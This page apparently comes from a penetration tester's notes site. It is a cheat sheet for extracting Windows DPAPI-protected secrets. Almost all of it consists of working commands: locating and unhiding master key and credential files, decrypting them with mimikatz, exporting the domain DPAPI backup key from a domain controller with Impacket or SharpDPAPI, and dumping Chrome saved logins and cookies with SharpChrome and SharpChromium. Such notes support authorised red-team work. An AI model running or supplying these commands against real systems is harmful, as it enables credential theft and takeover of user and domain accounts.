TwitterGitHubBlog

DPAPI

Data Protection API

8MB
ZN17 - Hunting for Credentials Dumping in Windows Environment (Teymur Kheirkhabarov).pdf
pdf

Master keys locations (hidden files, need -Force):

PS > ls -Force C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\)
PS > ls -Force C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\)

Credential files locations (hidden files, need -Force):

PS > ls -Force C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\)
PS > ls -Force C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\)

Unhide files:

PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff"
PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff"

Mimikatz

Decrypt manually offline with known plaintext password:

mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd!
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff

Impacket

Retrieve the domain DPAPI backup key (never changes) from a DC to decrypt master key and blobs:

$ dpapi.py backupkeys --export -k -no-pass -t DC01.megacorp.local
$ dpapi.py masterkey -file ./Users/Administrator/AppData/Roaming/Microsoft/Protect/<SID>/00ff00ff-00ff-00ff-00ff-00ff00ff00ff {-password 'Passw0rd!' -sid <SID> | -pvk 'G$BCKUPKEY_<GUID>.pvk}
$ dpapi.py credential -file ./Users/Administrator/AppData/Roaming/Microsoft/Credentials/00ff00ff00ff00ff00ff00ff00ff00ff -key 0x<HEX_MASTER_KEY>

SharpDPAPI

Triage user's credentials, vaults, rdg and certificates:

Cmd > .\SharpDPAPI.exe triage /password:Passw0rd!

Triage machine's credentials (machinecredentials), vaults (machinevaults) and certificates (certificates /machine):

Cmd > .\SharpDPAPI.exe machinetriage

Retrieve the domain DPAPI backup key (never changes) from a DC to decrypt master key and blobs for any user in the domain with it (needs DA privileges):

Cmd > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]
Cmd > .\SharpDPAPI.exe credentials /pvk:key.pvk [/server:PC01.megacorp.local]

SharpChrome

Cmd > .\SharpChrome.exe logins|cookies [/pvk:key.pvk]

SharpChromium

Cmd > dir "C:\Users\snovvcrash\AppData\Local\Google\Chrome\User Data\Default"
Cmd > .\SharpChromium.exe logins
Cmd > .\SharpChromium.exe cookies

Tools

Last updated